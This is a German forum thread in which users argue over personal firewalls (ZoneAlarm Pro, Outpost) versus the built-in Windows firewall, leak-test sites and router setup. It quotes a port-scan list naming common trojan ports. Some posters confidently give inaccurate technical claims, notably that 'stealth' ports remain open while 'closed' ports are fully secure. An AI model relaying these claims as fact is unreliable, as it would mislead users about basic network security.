Ich probiere mom. ein paar FWs durch...
Mit ein paar Leaktests wollte ich die FWs testen. Dabei ist mir aufgefallen, das Zonealarm Pro die Seite http://www.pcflank.com/ bei "Spy-Site-Blocker" abblockt. Ich hab diese Seite nun erlaubt.

Ich hab dann alle Tests durchgearbeitet und festgestellt, dass die WIN-XP-FW nichts durchlässt, bei Zonealarm aber die Ports 80 + 81 offen sind.

Jetzt bitte keine Diskussion, dass ich mit einen Router hinstellen soll. Für mich bedeutet das viel höherer Aufwand, da ich für viele Programme die Ports forwarden müsste. Router scheidet also aus...

Kann ich Zonealarm vertrauen oder doch besser die Windows-FW?
Was ist mit dem Konfig-Programm von Dingens-Org zu halten? Und was taugen diese Leaktest-Seiten wie PC-Flank etc.?

Ich habe bisher mit Zonealam die Erfahrung gemacht, dass diese Firewall erst dann "akzeptabel" wird, wenn sie ordentlich eingestellt ist.

Für den ungeübten Nutzer ist das aber erst nach einer Menge Suche und Probieren Geschichte.

Letztendlich kann man aber die ZA Firewall weiter einstellen und modifizieren.

Was genau du suchst und brauchst, kann ich dir natürlich damit nicht beantworten.

Gruß
Zolu

Bei der Einstellung "Stealth" sollten auch alle Ports stealth sein. Sind sie aber nicht. Bei XP aber schon.

Lass mal bitte bei "Advanced Port Scanner - TCP connect scanning (standard) (oder TCP SYN scanning) - Scan 20 random ports" durchrennen.
Bin gespannt was bei dir rauskommt. Wenn bei dir wirklich ALLES "stealth" sein sollte, will ich deine genauen Einstellungen :wink:

http://www.pcflank.com/


PS: Und kann mir jmd sagen wie ich das verdammte Zonealarm dazu bewege den 2. PC im Netzwerk ins Internet zu lassen (per ICS)? Was muss ich da genau einstellen? bei ZA ist das voll der Krampf. Bei Norton Internet Security war das so extrem einfach (diese FW will ich aber nicht)

Sicherheitslevel auf mittel stellen. Außerdem musst du ausgehendes DNS zulassen (der Haken muss rein) Und wenn es gar nicht gehen sollte: ZoneAlarm Pro. Damit funktionierts auf jeden Fall, denn das hat extra Einstellungen dafür... und laut Google läufts dann auf Anhieb. Ist wohl extra so gemacht. ;)

Da lobe ich mir die FW von Vista. Alles dicht, ohne groß was einstellen zu müssen.

Alle Tests mit PC-Flank bestanden?

Da lobe ich mir die FW von Vista. Alles dicht, ohne groß was einstellen zu müssen.

Dummerweise taugt die gar nichts, genau wie bei XP.

Bei den OS-Firewalls wirste das Problem haben, das jede Software sich selbst dort eintragen kann, daher ist der Effekt gleich Null. ;)

Das find ich irgendwie lächerlich! Wofür ne Firewall, wenn jede Softwareanwendung sich selbst dort eintragen oder sie deaktivieren kann...
Bei den anderen Softwarelösungen kann man zumindest Passwörter festlegen und Zugriffsrechte entziehen.

Da lobe ich mir die FW von Vista. Alles dicht, ohne groß was einstellen zu müssen.

ohne was einstellen zu müssen auch nicht, aber wenn man weiß was man tut ist sie schon gut.

Bei den OS-Firewalls wirste das Problem haben, das jede Software sich selbst dort eintragen kann, daher ist der Effekt gleich Null.

eben nicht, gegenüber einer externen firewall ist die firewall im OS wesentlich besser vor manipulationen von außen durch UAC geschützt, da kann sich eine software nicht einfach eintragen.
um sich einzutragen muss eine schadsoftware auch überhaupt mal erst auf den rechner, was die FW ja eigentlich verhindern sollte.

die ganzen softwarefirewalls sind alle schrott.

mach doch die ports per hand zu und schalte unnötige dienste ab - das ist sicherer als jede softwarefirewall.
regelmässige windows updates und ein wenig "brain.exe" dann passt das schon

We have scanned your computer' ports used by the most widespread trojan horses. Here is the description of possible ports' statuses:
21 closed FTP File Transfer Protocol is used to transfer files between computers
23 closed TELNET Telnet is used to remotely create a shell (dos prompt)
80 closed HTTP HTTP web services publish web pages
135 closed RPC Remote Procedure Call (RPC) is used in client/server applications based on MS Windows operating systems
137 closed NETBIOS Name Service NetBios is used to share files through your Network Neighborhood
138 closed NETBIOS Datagram Service NetBios is used to share files through your Network Neighborhood
139 closed NETBIOS Session Service NetBios is used to share files through your Network Neighborhood
1080 closed SOCKS PROXY Socks Proxy is an internet proxy service
1243 closed SubSeven SubSeven is one of the most widespread trojans
3128 closed Masters Paradise and RingZero Trojan horses
12345 closed NetBus NetBus is one of the most widespread trojans
12348 closed BioNet BioNet is one of the most widespread trojan
27374 closed SubSeven SubSeven is one of the most widespread trojans
31337 closed Back Orifice Back Orifice is one of the most widespread trojans

mach doch die ports per hand zu und schalte unnötige dienste ab - das ist sicherer als jede softwarefirewall.
regelmässige windows updates und ein wenig "brain.exe" dann passt das schon

Bei deiner "tollen" Idee, kann er den Programmzugriff nicht mehr steuern und das ist gerade das Ziel bei den meisten, die ne PFW nutzen!

Der Tipp ist daher vollkommen unbrauchbar, da er keinen Ersatz darstellt!!

die ganzen softwarefirewalls sind alle schrott.

mach doch die ports per hand zu und schalte unnötige dienste ab - das ist sicherer als jede softwarefirewall.
regelmässige windows updates und ein wenig "brain.exe" dann passt das schon

We have scanned your computer' ports used by the most widespread trojan horses. Here is the description of possible ports' statuses:
21 closed FTP File Transfer Protocol is used to transfer files between computers
23 closed TELNET Telnet is used to remotely create a shell (dos prompt)
80 closed HTTP HTTP web services publish web pages
135 closed RPC Remote Procedure Call (RPC) is used in client/server applications based on MS Windows operating systems
137 closed NETBIOS Name Service NetBios is used to share files through your Network Neighborhood
138 closed NETBIOS Datagram Service NetBios is used to share files through your Network Neighborhood
139 closed NETBIOS Session Service NetBios is used to share files through your Network Neighborhood
1080 closed SOCKS PROXY Socks Proxy is an internet proxy service
1243 closed SubSeven SubSeven is one of the most widespread trojans
3128 closed Masters Paradise and RingZero Trojan horses
12345 closed NetBus NetBus is one of the most widespread trojans
12348 closed BioNet BioNet is one of the most widespread trojan
27374 closed SubSeven SubSeven is one of the most widespread trojans
31337 closed Back Orifice Back Orifice is one of the most widespread trojans
Die ganzen genannten Ports macht Windows FW auch "stealth"
Zudem hab ich nebenher noch eine simple, aber sehr effektive Anwendungs-FW laufen - Look´n´stop...

Und nochmal - wie zuverlässig ist PC-Flank? Bei der Windows-FW war alles "stealth". (neueste Patches drauf, klar).
Und ist "closed" überhaupt ausreichend?

btw: "Brain.exe" arbeitet auch nicht immer 100%ig fehlerfrei :wink:

Bei deiner "tollen" Idee, kann er den Programmzugriff nicht mehr steuern und das ist gerade das Ziel bei den meisten, die ne PFW nutzen!

warum willst du einen programmzugriff steuern? wo ist der sinn?

Und nochmal - wie zuverlässig ist PC-Flank?


ich wett nix drauf da sie werbung für softwarefirewalls machen und die sogar empfehlen .... ich denke die seite gehört zu agnitum (outpost pro).
die werden wohl kaum für jemanden anderen werben ;D

Soso...
Komischerweise blockt Outpost diese Seite auch. Musste erst die Einstellung ändern, damit ich scannen konnte.
Bis jetzt hab ich mit der Windows FW am wenigsten Probleme.
Weder Zonealarm Pro noch Outpost Firewall Pro 2008 konnte ich dazu bewegen, dass der 2. PC im Netzwerk per ICS über PC1 ins Internet kann :(

Mit Norton Internet Security ging das so einfach.


btw. zur Windows-FW...

Haltet ihr davon auch nix?

http://dingens.org/

Wenn Sie Windows XP SP2 haben, brauchen Sie "Windows-Dienste abschalten" nicht unbedingt. Schalten Sie die Windows-Firewall an, das genügt. "Windows-Dienste abschalten" ist primär für Windows 2000 und für Windows XP vor SP2 gedacht.

http://www.defense.at/security/uploads/pics/zugesperrt_free_185x139.jpg

closed = closed


die softwarefirewalls blocken jeden müll damit der anwender glaubt er brauche eine softwarefirewall.

warum willst du einen programmzugriff steuern?

Warum nicht? Lässt du auch jeden an deinen Rechner ran?

wo ist der sinn?

Ganz einfach: Meine Daten gehen niemanden etwas an! Außerdem ist es vom Vorteil zu sehen, WOHIN Daten gehen würden und WELCHE Programme das sind... diese fliegen schnell runter von der Platte.

Ohne Logfunktion würden viele nicht mal wissen, das einige Programme aufs Netz zugreifen, ohne das die notwendigkeit dafür besteht. Und genau darin sehe ich KEINEN SINN.

Kann ich Zonealarm vertrauen oder doch besser die Windows-FW?[7quote]Also wenn du keine Diksussion willst, dann kann ich dir nur sagen, daß Zonealarm diesbezüglich sogar schlechter als Notepad ist.

[quote]Was ist mit dem Konfig-Programm von Dingens-Org zu halten? Und was taugen diese Leaktest-Seiten wie PC-Flank etc.?TheCell, mein Freund, eine Sicherheitsbewegung tut sich hier langsam auf. Freu dich :biggrin:

Snoopy, Dingensorg ist ok. Außer du solltest danach den Taskplaner-Dienst wieder anwerfen.

Warum schreibst du es aber hier, wo das meiste Gejammer über verschwundenes Papierkorbicon oder die Deinstallation von Vista handelt? Wir haben ein schönes Sicherheit-Subforum.
Da wirst du ZilD zb. extrem selten treffen was dir mittlerweile als Vorteil erscheinen sollte. Versuchs halt nochmal.

Auch das bietet sich für solche Fragen wunderbar an
http://www.forum-3dcenter.org/vbulletin/showthread.php?t=403520

Nur weil man in so einem Thread Fragen stellt muß man sich nicht direkt wegen dem Threadnamen als DAU fühlen. Nur Mut ;)

http://www.defense.at/security/uploads/pics/zugesperrt_free_185x139.jpg

closed = closed


die softwarefirewalls blocken jeden müll damit der anwender glaubt er brauche eine softwarefirewall.
"closed" reicht halt nicht. Ein PC mit closed Ports ist für den Angreifer immer noch sichtbar - ein stealth PC jedoch nicht, oder?

Hab die PFWs wieder runtergeschmissen und nur die Windows-FW + VS laufen. Dürfte reichen, oder? Der PC reagiert jedenfalls wieder wesentlich schneller...

Hab die PFWs wieder runtergeschmissen und nur die Windows-FW + VS laufen. Dürfte reichen, oder? Der PC reagiert jedenfalls wieder wesentlich schneller...

DAS ist ganz sicher Einbildung.

Ich hab bestimmt schon ~8 Jahre ohne und fast die gleiche Zeit mit (P)FW gearbeitet und konnte da keinen Unterschied feststellen. Könnte vielleicht dein Virenscanner sein, der bremst in der Tat oft aus. :)

[...]
Hab die PFWs wieder runtergeschmissen und nur die Windows-FW + VS laufen. Dürfte reichen, oder? Der PC reagiert jedenfalls wieder wesentlich schneller...
Meiner Meinung nach, sollte das auch ausreichen. ;)

DAS ist ganz sicher Einbildung.

Ich hab bestimmt schon ~8 Jahre ohne und fast die gleiche Zeit mit (P)FW gearbeitet und konnte da keinen Unterschied feststellen. Könnte vielleicht dein Virenscanner sein, der bremst in der Tat oft aus. :)
Na wenn du das sagst... :rolleyes:

Der PC bootet AUF JEDEN FALL schneller. Internet-Seiten gehen gehen auch etwas flotter auf. Ich muss es doch wissen, da zwischen "Vorher" und "Nachher" nicht mal 5min. liegen. Somit kann ich das ganz gut beurteilen. :wink:
Wenn du mir nicht glaubts mach dir mal probehalber Zonealarm oder Outpost drauf...

http://www.zonealarm.com/store/content/catalog/products/trial_zaFamily/trial_zaFamily.jsp?dc=34std&ctry=&lang=de&lid=db_trial
http://www.agnitum.de/produkte/personal-firewall/download.php


Das Programm hier sieht auch ganz gut aus...

http://cmia.backtrace.org/

Jetzt müsste ich nur noch wissen welche Dienste ich unbedingt brauche und welche nicht.

Das hier hab ich mir nich nicht angeguckt...

http://sourceforge.net/project/showfiles.php?group_id=93893


PS: Warum sollte ich den Taskplaner-Dienst wieder anwerfen? :confused:
Mich würde auch interessieren, ob ich nur die Features der FWs da oben nutzen kann, die eigentliche FW aber abgeschaltet lasse, um die Windows-FW zu nutzen. Das geht hab ich gesehen.
Sinnvoll finde ich bei Zonealarm diese E-Mail-Blocker, der nur Mails durchlässt, deren Addys man vorher eingetragen hat. Alles andere wird autom. blockiert.

Der PC bootet AUF JEDEN FALL schneller.

Kann er gar nicht, ZA wird z.B. erst geladen, wenn schon der blaue Screen zu sehen ist. Davor ist das gar nicht aktiv... Einfluss unmöglich.

Internet-Seiten gehen gehen auch etwas flotter auf.

Wobei?
So wie ich das hier lese, hattest du weitere Dienste aktiv, Spy-Site-Blocker? Die kosten natürlich extra-Leistung, da der Privacy und Werbefilter eine extra Anwendung ist (die hat ZA Pro integriert)!

Genau den selben Effekt wirste auch haben, wenn du Router-FW und WebWasher etc. laufen hast. Hat das damit also nix zu tun.

Wenn du mir nicht glaubts mach dir mal probehalber Zonealarm oder Outpost drauf...

Ich brauch dir nicht glauben, da ich es genau weiß.

Nach fast 15 Jahre Erfahrung mit allen möglichen Softwaretools aus diesem Bereich und darunter auch der frühere Norton-Virenscanner (;D), kann ich dir eindeutig sagen: Daran liegt es nicht. Auch heute nicht, denn die Software kommt bei mir beim Zweitrechner zum Einsatz und der lief lange Zeit auch ohne...

Bei mir ist das surfen über Jahre (!) und dutzende Versionen hinweg (!) gleichschnell geblieben.

Du scheinst nur was falsch gemacht zu haben, was du uns hier nicht mitteilen magst. Mehr brauch ich dazu nicht mehr sagen.

Kann er gar nicht, ZA wird z.B. erst geladen, wenn schon der blaue Screen zu sehen ist. Davor ist das gar nicht aktiv... Einfluss unmöglich.



Wobei?
So wie ich das hier lese, hattest du weitere Dienste aktiv, Spy-Site-Blocker? Die kosten natürlich extra-Leistung, da der Privacy und Werbefilter eine extra Anwendung ist (die hat ZA Pro integriert)!

Genau den selben Effekt wirste auch haben, wenn du Router-FW und WebWasher etc. laufen hast. Hat das damit also nix zu tun.
Muss ich jetzt erst hier paar handgestoppte Benches abliefern?

Es ist einfach so!!!

Hier nur zu posten ohne es ausprobiert zu haben zählt nicht. Die Downloadlinks der beiden FWs stehen oben :wink:

Zudem - ich mache viel im Netzwerk. Der Inhalt von Netzwerk-Ordnern (mit ziemlich vielen Dateien) wird deutlich später angezeigt.

Muss ich jetzt erst hier paar handgestoppte Benches abliefern?

Es ändert nichts an der Behauptung.

Es ist einfach so!!!

Bei mir nunmal nicht. Und da kannst du noch so viel erzählen wie du möchtest. Es ändert rein gar nichts an der Performance hier.

Hier nur zu posten ohne es ausprobiert zu haben zählt nicht. Die Downloadlinks der beiden FWs stehen oben :wink:

Ich hatte eigentlich erwartet, das du den Text richtig liest. ZA Pro habe ich mehrere Jahre lang im Einsatz. Mehrere Versionen.
Außerdem nutzte ich einen noch größeren Zeitraum lang die Free-Version und dazwischen noch einige andere Programme von Kaspersky, Symantec (heut gottseidank nicht mehr). Dazu kommen Erfahrungen mit diversen Virenscannern. Mir vorzuwerfen, ich wüsste nicht, wovon ich rede, grenzt, lass es mich milde ausdrücken, an Unwissenheit.
Du willst mit 5 Minuten - einigen Tage Erfahrung mehr wissen, als ich mit 15 Jahren Softwarerfahrung + einem abgeschlossen Stadium und Berufserfahrung als Netzwerktechniker? Find ich ja schon ein wenig lustig.

Ich sag dir nur wie es ist: Schalt alles ab, was nicht zur reinen PFW gehört (Cookifilter, Werbeblocker, Spysite-Blocker..) und du hast die Probleme nicht mehr. So einfach ist das.

Sorry, ich hab auch 20Jahre Erf. mit PCs und 10Jahre mit Internet.
Aber bisher haben ALLE Software-FWs (aufnahmslos) zu mehr oder weniger Perf.-Verlust beim Surfen und booten geführt. Das ist meine Erf. und kann man auch vielfältig im Netz lesen... :wink:

So, nun wieder BTT

Na wenn du so viel Erfahrung hast, dann kannst du mir sicherlich sagen, warum dieser Sachverhalt bei mir niemals eintrat obwohl die Software die gleiche gewesen ist?

Das eine Suchmaschine etwas anderes ausspuckt, wundert mich absolut nicht. Die meisten scheitern schon bei einer Frage was eine Firewall überhaupt ist, geschweige denn, schaffen sie es, sie zu konfigurieren. Und das gilt gleichermaßen für Router und PFW.

Du, ich diskutiere hier nicht weiter solange du dir nicht auch mal Zonealarm Pro draufgehauen hast.
Booten dauert deutlich länger - daran gibts nichts zu rütteln!!!

Und zwar ca. 20sek. länger als mit WIN XP-FW. Eben von Hand abgestoppt :wink:

Und jetzt, hm?

Du, ich diskutiere hier nicht weiter solange du dir nicht auch mal Zonealarm Pro draufgehauen hast.

Ist auch gar nicht nötig, da du offenbar leseresistent bist.

Ich hatte alle ZA-Pro Versionen der letzten Jahre im Einsatz und bei keiner, ich wiederhole bei keiner, gab es diese Einschränkung die du hier ansprichst. Und ich habe den direkten Vergleich, da ich mehrere PCs verwende und die nach jeder frischen Installation nur mit der Win-FW zum Updatesaugen etc. ins Netz gegangen sind.

Wie ich schon sagte: JAHRE IM EINSATZ. Das habe ich nun schon mehrfach wiederholt, aber du verstehst es offenbar nicht.

Du Glücklicher...
Bist dann wohl einer von wenigen auf der Welt, bei dem eine Software-FW das Sys. nicht bremst.

Ich wette du du hast den Download-Link nicht mal betätigt. Warum sollte ich einem so ignoranten Gast glauben?
Wie gesagt - ich hatte es vorhin von Hand abgestoppt. ZA Pro braucht ca. 20sek. länger - ende aus!!!
Wahrscheinlich hast du es wirklich schon Jahre im Einsatz und kennst den Unterschied nicht mehr, wie es ohne ZA performt.


Nun BTT...

Du, ich diskutiere hier nicht weiter solange du dir nicht auch mal Zonealarm Pro draufgehauen hast.
Booten dauert deutlich länger - daran gibts nichts zu rütteln!!!

Und zwar ca. 20sek. länger als mit WIN XP-FW. Eben von Hand abgestoppt :wink:

Und jetzt, hm?
Na herzlichen Glückwunsch! - Bei mir ist nach der Installation von ZA Pro 2006 der PC nicht mal mehr gestartet. - Und warum? - Weil ZA Pro eine geniale FW ist. So genial, daß sie sogar dazu in der Lage ist, den Start des Windows Explorer zu sabotieren. Eigentlich sollte ja ein Pop-Up kommen und mich fragen, ob der Windows Explorer auf das lokale Netz zugreifen darf. Leider kann das Pop-Up aber nicht kommen, weil der Desktop beim Start des Windows Explorer (zur Anmeldung im Netzwerk) noch gar nicht geladen ist. Erst im abgesicherten Modus (ohne Netzwerk) ließ sich dieser Meilenstein der Softwareentwicklung aus dem Weg rollen (=deinstallieren).

Tja - da merkt man, daß ZA mittlerweile eine ganz tolle Software geworden ist. - Früher (als Windows noch keine eigene FW hatte) war ZA mal wirklich gut, weil man sehr viel von Hand einstellen konnte und die FW wirklich nur das gemacht hat, was man ihr gesagt hat. Heute ist es nur noch reguläre Spyware, die selbst ständig nach Hause telefoniert und sich nichtmals mehr sauber deinstallieren läßt. Es ist wirklich Schade, was aus ZA im Laufe der Zeit geworden ist.

So und jetzt mein Rat (den du, wie oben geschrieben, nicht hören willst):
In meinen Augen ist heute die EINZIGE Möglichkeit, seinen PC gegen Angriffe aus dem Netz zu sichern ein 'stramm' konfigurierter NAT Router.

Die Windows-FW ist zwar gegen einen 0815-Angriff aus dem Netz ganz brauchbar, aber wenn der Angriff von einer Software aus initialisiert wird, die du selbst aufgrund einer geschickten Täuschung zuvor installiert hast, dann ist die Windows-FW absolut wirkungslos. - Das Manko, daß diese FW von innen heraus ohne Wissen des Nutzers deaktiviert werden kann, wurde oben ja schon angesprochen. - Würde dir nie passieren? - Wie oft hast du dem Firefox schon ein Update durchgewunken, OHNE dir vorher den Server anzusehen, von dem das Update überspielt wird. - Ich bin mir sogar sicher, das 99% der ZA-User inzwischen sogar blind auf 'SoftwareXY erlauben' drücken, weil ZA bei jeder kleinsten Änderung an der .exe eine erneute Bestätigung anfordert. - Zumindest mache ich es so, weil ich keine Lust mehr habe mir an der Microschrift die Augen zu verrenken. - Aber das kann ich auch, weil ich hinter einem stramm konfigurierten NAT-Router sitze, der alles abblockt. - Wozu habe ich dann überhaupt noch ZA? - Damit meine anderen Rechner im LAN nicht von meinem PC mit Windowsservices zugespamt werden.

Und um die Ausgangsfrage zu beantworten:

Zonealarm Pro schlechter als WIN-XP-Firewall?

Nein, denn beide sind gleich schlecht, wobei die XP-Firewall dein System mit Sicherheit weniger durcheinanderwürfelt und besser integriert ist.

Ein PC mit closed Ports ist für den Angreifer immer noch sichtbar - ein stealth PC jedoch nicht, oder?

Falsch.

"closed" reicht halt nicht. Ein PC mit closed Ports ist für den Angreifer immer noch sichtbar - ein stealth PC jedoch nicht, oder?

Es ist leider genau aunders herum: CLOSED ist wirklich zu; niemand kommt von außen heran. Gerade so, als hättest du eine Tür oder Fenster fest zugemauert.

STEALTH hingegen ist nur "unsichtbar", aber im Hintergrund immer noch offen. So als hättest du deine Eingangstür oder Fenster mit einem Vorhang verdeckt, um sie zu verstecken.

Warum sollte die Reihenfolge von unsicher zu sicher und wieder zu unsicher gehen? Also open - closed - stealth.
Genauso gut könnte ich sagen "die Tür ist verschlossen und verdeckt"

Demnach müsste XP ja ganz ohne FW sicherer sein als mit, da mehr closed Ports angezeigt werden als stealth. Irgendwie auch paradox, wenn man den Schieberegler in FWs aufs Minimum von Sicherheit einstellt und gleichzeitig viel sicherer sein soll!?!?!?

Laut dingens.org ist man aber mit FW sicherer als ganz ohne. Wem kann man nun glauben? Oder warum sehen alle Online-FW-Tester "stealth" als gut an? Welchen Grund soll das haben?
Oder warum werden von mir manuell blockierte Ports als stealth gescannt und nicht als closed bzw. was stelle ich ein, damit der blockierte Port als closed gescannt wird?

Bei der Einstellung "Stealth" sollten auch alle Ports stealth sein.

Wofür soll das denn gut sein? Um unsichtbar zu sein, so wie es die Schlangenöl-Prediger versprechen? Unsichtbar ist man erst, wenn der letzte Rechner vor dem zu "schützenden" Computer ein "no route to host" liefert. Ansonsten weiß jeder, dass da ein durch eine PFW "geschützer" (oder besser gesagt mit zusätzlichen Lücken versehener) Rechner steht. Die PFW-Hersteller lügen. Es tut mir leid das so sagen zu müssen. Das ist wie ein kleines Kind, welches sich die Augen zuhält und dann glaubt, dass niemand anderes es nun noch sehen kann.

Beim Zustand STEALTH (der im Übrigen kein ofizieller Zustand für einen Port im Netzwerk ist), ist der Port noch OFFEN, wird aber von der PFW mehr oder weniger gut "unsichtbar" gemacht. Beim Zustand CLOSED ist der Port GESCHLOSSEN und damit absolut und zu 100% dicht. Punkt.

Ich bin auch der Meinung das die Windows-Firewall vollkommen ausreichend vor Angriffen von außen ist.

Meistens kommen die Viren/Trojaner und sonstige Schadprogramme eh von innerhalb des Systems indem sie irgendwo heruntergeladen wurden und dort kommt dann der Virenscanner, den jeder drauf haben sollte, zum Einsatz.

Bist dann wohl einer von wenigen auf der Welt, bei dem eine Software-FW das Sys. nicht bremst.

Ich gehöre eher zu der Sorte von Usern, die keine Probleme damit hat, weil sie weiß, was sie damit anstellen kann.

Ich wette du du hast den Download-Link nicht mal betätigt. Warum sollte ich einem so ignoranten Gast glauben?

Kannst du auch etwas konstruktives schreiben, anstatt ignoranten, provokativen und hirnlosen Müll?

Was du mir glaubst, geht mir das völlig am Hintern vorbei, das zeigt nur, das du nicht in der Lage bist, einfache Sachverhalte zu verstehen und hier ganz gezielt Produkte schlechtredest, allein aufgrund deiner Unfähigkeit, diese richtig konfigurieren zu können.

Ich brauche mich vor niemanden rechtfertigen, das solltest du in deinem Alter langsam mal verstanden haben oder halt nicht, wenn du noch in dieser Phase bist.

Wie gesagt - ich hatte es vorhin von Hand abgestoppt. ZA Pro braucht ca. 20sek. länger - ende aus!!!

Wie schon gesagt ist das unmöglich, der Dienst wird erst später geladen.

Könnte an deinem Netzwerk liegen ...

Wahrscheinlich hast du es wirklich schon Jahre im Einsatz und kennst den Unterschied nicht mehr, wie es ohne ZA performt.

Absolut ausgeschlossen. Ich sagte schließlich nicht, das ich es auf allen Rechnern nutzte.

Die Windows-FW ist zwar gegen einen 0815-Angriff aus dem Netz ganz brauchbar, aber wenn der Angriff von einer Software aus initialisiert wird, die du selbst aufgrund einer geschickten Täuschung zuvor installiert hast, dann ist die Windows-FW absolut wirkungslos.

dagegen ist jede FW wirkungslos und das ist auch nicht mehr das aufgabengebiet einer FW. diese soll angriffe von außen verhindern und nicht welche die sich schon eingenistet haben.

dagegen ist jede FW wirkungslos und das ist auch nicht mehr das aufgabengebiet einer FW. diese soll angriffe von außen verhindern und nicht welche die sich schon eingenistet haben.
Falsch. Genau das ist das Aufgabengebiet einer FW: Kontrolle des gesamten Netzverkehrs. Deshalb sitzen die meisten heute hinter einem NAT-Router. Eine Firewall funktioniert in beide Richtungen: Angreifer von außen sollen keine Daten einschleusen können und Angreifer von innen sollen ungefragt keine Daten herausschmuggeln können. Deswegen wird der Internetzugang für Anwendungen per Whitelist/Blacklist beschränkt und die Ports gesperrt. Ob man nun im Internet sichtbar ist oder nicht (stealth) ist lediglich eine sekundäre Funktion einer FW. Abgesehen davon sind die meisten Stealth-Routinen wirkungslos, da moderne Portscanner inzwischen durchaus in der Lage sind, die Zeitverzögerung bei der Abfrage eines getarnten Ports und eines tatsächlich nicht vorhandenen Ports zu erkennen.

Das mit dem stealth ist wie beim Lügen: Wer bei konkreter Anfrage auch nur kurz zögert oder rot wird, hat schon verloren.

Ich finde es wird echt übertrieben mit dem Sicherheitswahn..

Ich hab früher auch immer PFW benutzt.. Die bremsen aber aus und bringen eh nicht mehr..
Wovor habt ihr Angst??

Welche sensiblen Daten solltestn "raustelefoniert" werden??
Ich kann über diese Paranoia nur noch lachen..

Am PC keine Passwörter speichern, Brain.exe 2.0 einsetzen, Windows FW und Router Firewall, nen umfangreichen Virenscanner und gut ist.
Ab und zu mal Spybot drüberlaufen lassen, wobei der bei mir bei Vista eh nie was findet. Und wenn dann weiß ich vorher aus dem gefühl heraus, dass was nicht stimmt und er bestätigt es nur..

Keinen Blödsinn, mit Stealth Modus und ner ultradichten Firewall..
zumindest im privaten bereich..
Im Firmennetzwerk würde ich das sicher auch anders handhaben..

Ich würde mir auch lieber einen Router hinstellen...
Nur stelle ich mir die Konfig sehr aufwändig vor - also das Port-Forwarden für einige Programme. Und ich weiss nicht mal welche Ports das geforwarded werden müssen, da ein Router anders als eine PFW ja keine Meldung bringt, ob ich zulassen, blocken oder benutzerdefiniert einstellen soll.

Dann die Frage - welchen Router?
Es gibt einen Haufen Schrott auf dem Markt (zu schwache Rechenleistung), die sich ab und an einfach mal aufhängen. Diese Erf. musste ich schon machen, dabei war der Barricade 7004ABR damals sicher nicht schlecht (<- ist aber Müll, da instabil).

Also welche Router taugen was (min. 2 Port)?
Hab noch einen "Speedport W501V" rumliegen (war kostenlos). Taugt sicher auch nichts, oder? Notfalls müsste ich mit einer Netzwerk-Brücke arbeiten - da reicht dann der eine Port.

Und was ist, wenn ich hinter einem Router sitze? Brauch ich dann keine FW mehr? Ein Trojaner könnte ja trotzdem raus, oder nicht? Sollte ich die Anwendungs-FW "Look´n´Stop" noch nebenher laufen lassen (+ VS, klar)?

Eine Firewall funktioniert in beide Richtungen: Angreifer von außen sollen keine Daten einschleusen können und Angreifer von innen sollen ungefragt keine Daten herausschmuggeln können.

theoretisch, praktisch ist der schutz von innen heraus aber nicht möglich, es sei denn du kappst gleich die ganze netzwerkverbindung.

du brauchst nur einem programm den netzwerkverkehr nach außen erlauben, und schon kann jeder schädling darüber nach außen kommunizieren. bevorzugt werden dafür natürlich webbrowser missbraucht.

Ich finde es wird echt übertrieben mit dem Sicherheitswahn..

Welche sensiblen Daten solltestn "raustelefoniert" werden??
Ich kann über diese Paranoia nur noch lachen..

Ach - du siehst das völlig falsch. Ich glaub den meisten geht es gar nicht darum, ob persönliche Daten abgefragt werden oder ihre Rechner laufend gepingt werden etc etc. Das, was den meisten inzwischen tierisch auf die Nerven geht ist, daß verschiedene Windowsservices und Anwendungen ohne erkennbare Motivation plötzlich meinen ein Update aus dem Internet herunterladen zu müssen. Popups ohne Ende - und das bei manchen Antivirenprogrammen sogar alle 24 Stunden. Und noch schlimmer sind diejenigen Programme die ständig im Internet nachfragen, ob eventuell eine neue Version verfügbar ist. - Wenn das nur ein Programm alle 14 Tage mal machen würde, wärs erträglich. Aber heute will jeder kleine Pups ständig nur 'das Beste' für seinen User und telefoniert ständig nach draußen. Besonders wenn man empfindliche Software wie C&C3 / BF2 laufen hat, kann das schonmal zum Nervenzusammenbruch führen - denn: sobald man via Alt-Tab wieder auf den Desktop geht und nachsehen will, warum die Leitung 'tot' ist, steht Windows wieder 'Gewehr bei Fuß' und tut so als wäre 100% Leistung verfügbar. - Sobald der Desktop dann nicht mehr aktiv ist, gehen 99% der Windows-Progamme wohl davon aus, daß jetzt nur noch der Bildschirmschoner läuft, so daß in Ruhe nach Lust und Laune geupdated werden kann. Intelligenter Hintergrundübertragungsdienst oder so ähnlich heißt das miese 'Feature'. Das auf dem zweiten Core eventuell eine höchst sensible Anwendung läuft, die der DSL-Leitung alles abverlangt, geht diesem Windowsservice grad glatt am Arsch vorbei. ;)

Ne ne - wenn man auf seinem PC heute noch 'ernsthaft' eine Runde spielen will ohne belästigt zu werden (ich sag nur: Punkbuster heartbeats stopped - you have been disconnected from server), dann braucht man schon eine Firewall mit der man seinen DSL-Anschluß 'freischießen' kann.

Und was ist, wenn ich hinter einem Router sitze? Brauch ich dann keine FW mehr? Ein Trojaner könnte ja trotzdem raus, oder nicht? Sollte ich die Anwendungs-FW "Look´n´Stop" noch nebenher laufen lassen (+ VS, klar)?

Der NAT Router blockt Invasoren und die Firewall legt alle unnützen Microsoftservices und sonstige Progamme in Ketten. Wobei wir aber bereits wissen, daß die Windowsfirewall bei Windowservices alle Augen zudrückt. Zum Glück kann man aber inzwischen selber rausfinden, welche Services man braucht und die nichtbenötigten kurzerhand abschalten (dies gilt leider noch(?) nicht für Vista-User ;D ) Sinnvoll ist eine FW allemal, da man sich von Zeit zu Zeit mal ansehen kann, was alles geblockt wurde. So wird man unter Umständen auf Probleme aufmerksam, bevor die Kiste endgültig im Dreck stecken bleibt.

Es gibt allerdings inzwischen durchaus Leute, die ganz auf ihre Kombination aus NAT-Router und Virenkiller vertrauen. Viele Virenkiller haben inzwischen ja auch bereits einen Funktionsumfang, der einer Firewall Konkurrenz macht. Aber ein aktiver Virenkiller frißt mir zuviel Resourcen - deswegen vertraue ich weiter auf meine Kombo aus NAT-Router und Firewall. Ich hatte übrigens noch nie einen Virus, Trojaner oder ähnliches auf meinem PC. Wenn alles richtig eingestellt ist, dann gibts eben kein Durchkommen. ;D

Wenn Anwendungen checken ob es ein Update gibt , dann is das doch in Ordnung. schließlich soll alles auf aktuellem Stand sein. Alle 14 tage wäre MIR zu wenig.. Der Virenscanner soll sich ja auch gerne jede Stunde mal kurz einlinken und gucken wat et neues gibt..wenns nach mir ginge..

Und Probleme is games deswegen hatte ich mal noch nicht.

